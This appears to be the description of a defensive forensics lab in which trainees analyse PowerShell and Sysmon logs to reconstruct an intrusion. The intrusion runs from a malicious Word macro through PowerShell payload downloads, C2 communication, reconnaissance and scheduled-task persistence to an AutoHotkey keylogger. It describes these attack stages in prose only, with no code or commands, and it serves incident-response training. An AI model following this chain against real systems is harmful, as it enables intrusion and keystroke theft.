This lab walks through a realistic intrusion scenario that begins with a malicious Microsoft Word document, a common initial access method used by threat actors. Once the victim enables macros, the document silently launches a PowerShell script that initiates the attack chain. This script downloads and executes additional payloads, which are used to establish communication with a command and control (C2) server.
From there, the attacker issues commands to conduct host and network reconnaissance, using native Windows utilities through PowerShell. The attack leverages scheduled tasks for persistence—specifically by abusing a scheduled task to run a customized AutoHotkey-based keylogger. This keylogger captures keystrokes in real time and stores them for future collection.
Throughout the attack, Windows PowerShell and Sysmon logs capture critical telemetry, giving you visibility into the attacker’s actions. By analyzing these logs, you will be able to reconstruct the full sequence of events—from the initial macro execution to the final stage of data collection. This lab will strengthen your skills in investigating script-based attacks, identifying persistence mechanisms, and performing Windows-based forensic analysis.